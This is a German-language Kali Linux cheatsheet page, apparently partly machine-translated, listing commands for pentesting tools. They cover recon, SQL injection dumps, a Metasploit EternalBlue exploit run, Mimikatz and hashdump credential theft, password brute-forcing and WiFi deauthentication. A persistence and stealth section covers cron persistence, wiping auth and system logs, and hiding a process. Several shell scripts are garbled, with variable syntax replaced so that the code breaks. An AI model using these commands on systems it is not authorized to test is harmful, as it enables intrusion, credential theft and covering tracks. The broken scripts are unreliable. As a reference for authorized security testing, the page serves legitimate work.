Zum Inhalt

Kali Linux Cheatsheet

generieren

Kali Linux ist eine Debian-basierte Linux-Distribution, die speziell für digitale Forensik und Penetrationstests entwickelt wurde. Kali Linux wird von Offensive Security entwickelt und gepflegt und wird mit über 600 Penetrationstests vorinstalliert, so dass es die Plattform für Cybersicherheitsexperten, ethische Hacker und Sicherheitsforscher weltweit ist.

Installation und Inbetriebnahme

Download und Installation

```bash

Download Kali Linux ISO

wget https://cdimage.kali.org/kali-2024.1/kali-linux-2024.1-installer-amd64.iso

Verify checksum

sha256sum kali-linux-2024.1-installer-amd64.iso

Create bootable USB (Linux)

sudo dd if=kali-linux-2024.1-installer-amd64.iso of=/dev/sdX bs=4M status=progress

Create bootable USB (Windows - use Rufus or similar tool)

Use Rufus, Etcher, or Win32DiskImager

```_

Virtual Machine Setup

```bash

VMware recommended settings

RAM: 4GB minimum, 8GB recommended

Storage: 80GB minimum

Network: NAT or Bridged

VirtualBox recommended settings

RAM: 4GB minimum, 8GB recommended

Storage: 80GB minimum, VDI format

Network: NAT or Bridged

Enable VT-x/AMD-V virtualization

```_

Erstkonfiguration

```bash

Update system

sudo apt update && sudo apt upgrade -y

Install additional tools

sudo apt install -y kali-linux-large

Configure non-root user (recommended)

sudo useradd -m -s /bin/bash username sudo usermod -aG sudo username sudo passwd username

Enable SSH (if needed)

sudo systemctl enable ssh sudo systemctl start ssh

Configure firewall

sudo ufw enable sudo ufw default deny incoming sudo ufw default allow outgoing ```_

Wesentliche Werkzeuge und Befehle

Informationen sammeln

```bash

Nmap - Network scanning

nmap -sS -sV -O target_ip nmap -sC -sV -oA scan_results target_ip nmap --script vuln target_ip

Masscan - Fast port scanner

masscan -p1-65535 target_ip --rate=1000

Dmitry - Information gathering

dmitry -winsepo output.txt target.com

theHarvester - Email and subdomain gathering

theHarvester -d target.com -l 500 -b google

Recon-ng - Web reconnaissance framework

recon-ng [recon-ng][default] > workspaces create target_workspace [recon-ng][target_workspace] > modules load recon/domains-hosts/google_site_web ```_

Bewertung der Schwachstelle

```bash

OpenVAS - Vulnerability scanner

sudo gvm-setup sudo gvm-start sudo gvm-feed-update

Nikto - Web vulnerability scanner

nikto -h http://target.com nikto -h http://target.com -o nikto_results.txt

Dirb - Directory brute forcer

dirb http://target.com dirb http://target.com /usr/share/dirb/wordlists/big.txt

Gobuster - Directory/file brute forcer

gobuster dir -u http://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt gobuster dns -d target.com -w /usr/share/wordlists/dnsmap.txt

WPScan - WordPress vulnerability scanner

wpscan --url http://target.com --enumerate u,p,t wpscan --url http://target.com --passwords /usr/share/wordlists/rockyou.txt ```_

Web Application Testing

```bash

Burp Suite - Web application security testing

burpsuite &

OWASP ZAP - Web application scanner

zaproxy &

SQLmap - SQL injection testing

sqlmap -u "http://target.com/page.php?id=1" --dbs sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump

Commix - Command injection testing

commix --url="http://target.com/page.php?id=1"

XSSer - Cross-site scripting testing

xsser --url "http://target.com/search.php?q=XSS" --auto ```_

Exploitation

```bash

Metasploit Framework

msfconsole msf6 > search type:exploit platform:windows msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS target_ip msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

Searchsploit - Exploit database search

searchsploit apache 2.4 searchsploit -m 12345.py

Social Engineering Toolkit

setoolkit

Select from menu options for phishing, credential harvesting, etc.

BeEF - Browser exploitation framework

beef-xss

Access web interface at http://127.0.0.1:3000/ui/panel

```_

Post-Exploitation

```bash

Meterpreter commands (within Metasploit session)

meterpreter > sysinfo meterpreter > getuid meterpreter > ps meterpreter > migrate PID meterpreter > hashdump meterpreter > screenshot meterpreter > download C:\file.txt /tmp/ meterpreter > upload /tmp/file.txt C:\

Empire - PowerShell post-exploitation

powershell-empire server powershell-empire client

Mimikatz - Credential extraction

mimikatz mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords mimikatz # lsadump::sam ```_

Passwort-Angriffe

```bash

John the Ripper - Password cracking

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt john --show hashes.txt

Hashcat - Advanced password recovery

hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a?a?a?a

Hydra - Network login cracker

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target_ip hydra -L users.txt -P passwords.txt ftp://target_ip hydra -l admin -P /usr/share/wordlists/rockyou.txt target_ip http-post-form "/login.php:username=USER&password;=PASS:Invalid"

Medusa - Parallel login brute forcer

medusa -h target_ip -u admin -P /usr/share/wordlists/rockyou.txt -M ssh medusa -H hosts.txt -U users.txt -P passwords.txt -M ftp

Crunch - Wordlist generator

crunch 8 8 -t ,@@@@@@@ -o wordlist.txt crunch 6 10 abcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt ```_

Kabellose Sicherheit

```bash

Aircrack-ng suite - WiFi security testing

Monitor mode

airmon-ng start wlan0

Capture packets

airodump-ng wlan0mon

Capture specific network

airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

Deauth attack

aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

Crack WPA/WPA2

aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

Reaver - WPS attack

reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

Wifite - Automated wireless attack

wifite --wpa --dict /usr/share/wordlists/rockyou.txt ```_

Digitale Forensik

```bash

Autopsy - Digital forensics platform

autopsy &

Volatility - Memory analysis

volatility -f memory.dump imageinfo volatility -f memory.dump --profile=Win7SP1x64 pslist volatility -f memory.dump --profile=Win7SP1x64 netscan volatility -f memory.dump --profile=Win7SP1x64 malfind

Binwalk - Firmware analysis

binwalk firmware.bin binwalk -e firmware.bin

Foremost - File carving

foremost -i disk_image.dd -o recovered_files/

Sleuth Kit - File system analysis

fls -r disk_image.dd icat disk_image.dd inode_number > recovered_file ```_

Reverse Engineering

```bash

Ghidra - NSA reverse engineering tool

ghidra &

Radare2 - Reverse engineering framework

r2 binary_file [0x00000000]> aaa [0x00000000]> pdf @main

GDB - GNU Debugger

gdb binary_file (gdb) run (gdb) break main (gdb) continue (gdb) info registers

Strings - Extract strings from binaries

strings binary_file strings -n 10 binary_file|grep -i password

Hexdump - Hex viewer

hexdump -C binary_file|head -20 xxd binary_file|head -20 ```_

Systemverwaltung

Paketmanagement

```bash

Update package lists

sudo apt update

Upgrade all packages

sudo apt upgrade -y

Install specific tools

sudo apt install -y tool_name

Install Kali metapackages

sudo apt install -y kali-linux-large sudo apt install -y kali-linux-everything sudo apt install -y kali-tools-top10

Search for packages

apt search keyword apt show package_name

Remove packages

sudo apt remove package_name sudo apt purge package_name sudo apt autoremove ```_

Service Management

```bash

Systemctl commands

sudo systemctl start service_name sudo systemctl stop service_name sudo systemctl restart service_name sudo systemctl enable service_name sudo systemctl disable service_name sudo systemctl status service_name

Common services

sudo systemctl start ssh sudo systemctl start apache2 sudo systemctl start postgresql sudo systemctl start mysql

Check listening ports

netstat -tlnp ss -tlnp ```_

Netzwerkkonfiguration

```bash

Interface configuration

ip addr show ip link set eth0 up ip link set eth0 down

Static IP configuration

sudo nano /etc/network/interfaces

Add:

auto eth0

iface eth0 inet static

address 192.168.1.100

netmask 255.255.255.0

gateway 192.168.1.1

DNS configuration

sudo nano /etc/resolv.conf

Add:

nameserver 8.8.8.8

nameserver 8.8.4.4

Restart networking

sudo systemctl restart networking ```_

Benutzermanagement

```bash

Add user

sudo useradd -m -s /bin/bash username sudo passwd username

Add user to groups

sudo usermod -aG sudo username sudo usermod -aG adm username

Switch user

su - username sudo -u username command

View user information

id username groups username finger username

Lock/unlock user

sudo usermod -L username sudo usermod -U username ```_

Erweiterte Techniken

Benutzerdefinierte Werkzeuginstallation

```bash

Install from source

git clone https://github.com/tool/repository.git cd repository make && sudo make install

Python tools

pip3 install tool_name pip3 install -r requirements.txt

Go tools

go install github.com/tool/repository@latest

Ruby gems

gem install tool_name

Manual installation

wget https://example.com/tool.tar.gz tar -xzf tool.tar.gz cd tool ./configure && make && sudo make install ```_

Umwelt Anpassung

```bash

Bash aliases

nano ~/.bashrc

Add useful aliases:

alias ll='ls -la' alias la='ls -A' alias l='ls -CF' alias ..='cd ..' alias ...='cd ../..' alias grep='grep --color=auto' alias nmap='nmap --reason --open --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit'

Custom functions

function extract() \\{ if [ -f $1 ] ; then case $1 in *.tar.bz2) tar xjf $1 ;; *.tar.gz) tar xzf $1 ;; *.bz2) bunzip2 $1 ;; *.rar) unrar e $1 ;; *.gz) gunzip $1 ;; *.tar) tar xf $1 ;; *.tbz2) tar xjf $1 ;; *.tgz) tar xzf $1 ;; *.zip) unzip $1 ;; *.Z) uncompress \(1 ;; *.7z) 7z x \(1 ;; *) echo "'\)1' cannot be extracted via extract()" ;; esac else echo "'\)1' is not a valid file" fi \\}

Source the changes

source ~/.bashrc ```_

Automatisierungsskripte

```bash

Basic reconnaissance script

!/bin/bash

TARGET=\(1 if [ -z "\)TARGET" ]; then echo "Usage: $0 " exit 1 fi

echo "Starting reconnaissance on \(TARGET" mkdir -p results/\)TARGET

Nmap scan

echo "Running Nmap scan..." nmap -sS -sV -sC -O -oA results/$TARGET/nmap_scan $TARGET

Directory enumeration

echo "Running directory enumeration..." gobuster dir -u http://\(TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o results/\)TARGET/gobuster.txt

Nikto scan

echo "Running Nikto scan..." nikto -h http://\(TARGET -o results/\)TARGET/nikto.txt

echo "Reconnaissance complete. Results saved in results/$TARGET/" ```_

Persistenz und Stealth

```bash

SSH key persistence

ssh-keygen -t rsa -b 4096 ssh-copy-id user@target_ip

Cron job persistence

crontab -e

Add: @reboot /path/to/script.sh

Service persistence

sudo nano /etc/systemd/system/custom.service

Create service file for persistence

Log cleaning

sudo truncate -s 0 /var/log/auth.log sudo truncate -s 0 /var/log/syslog history -c && history -w

Process hiding

nohup ./malicious_binary > /dev/null 2>&1 & disown ```_

Fehlerbehebung

Gemeinsame Themen

```bash

WiFi adapter not working

sudo airmon-ng check kill sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up

VirtualBox guest additions

sudo apt install -y virtualbox-guest-x11 sudo VBoxClient --clipboard sudo VBoxClient --draganddrop

Graphics issues

sudo apt install -y kali-desktop-xfce sudo dpkg-reconfigure lightdm

Sound issues

sudo apt install -y pulseaudio pulseaudio --start

Network issues

sudo dhclient eth0 sudo systemctl restart networking sudo systemctl restart NetworkManager ```_

Leistungsoptimierung

```bash

Disable unnecessary services

sudo systemctl disable bluetooth sudo systemctl disable cups sudo systemctl disable avahi-daemon

Clean system

sudo apt autoremove sudo apt autoclean sudo apt clean

Monitor resources

htop iotop nethogs iftop

Optimize for VMs

sudo apt install -y open-vm-tools sudo apt install -y virtualbox-guest-utils ```_

Sicherheit Best Practices

Operationelle Sicherheit

```bash

Use VPN for testing

sudo openvpn config.ovpn

Proxy chains configuration

sudo nano /etc/proxychains.conf proxychains nmap target_ip

Tor usage

sudo systemctl start tor proxychains firefox

MAC address randomization

sudo macchanger -r wlan0 sudo macchanger -m 00:11:22:33:44:55 wlan0

Secure deletion

shred -vfz -n 3 sensitive_file wipe -rf directory/ ```_

Rechtliche und ethische Überlegungen

```bash

Always obtain proper authorization

Document scope and limitations

Follow responsible disclosure

Maintain confidentiality

Respect privacy and data protection laws

Create engagement documentation

echo "Penetration Test Authorization" > authorization.txt echo "Client: Company Name" >> authorization.txt echo "Scope: IP ranges, domains" >> authorization.txt echo "Date: $(date)" >> authorization.txt echo "Tester: Your Name" >> authorization.txt ```_

Ressourcen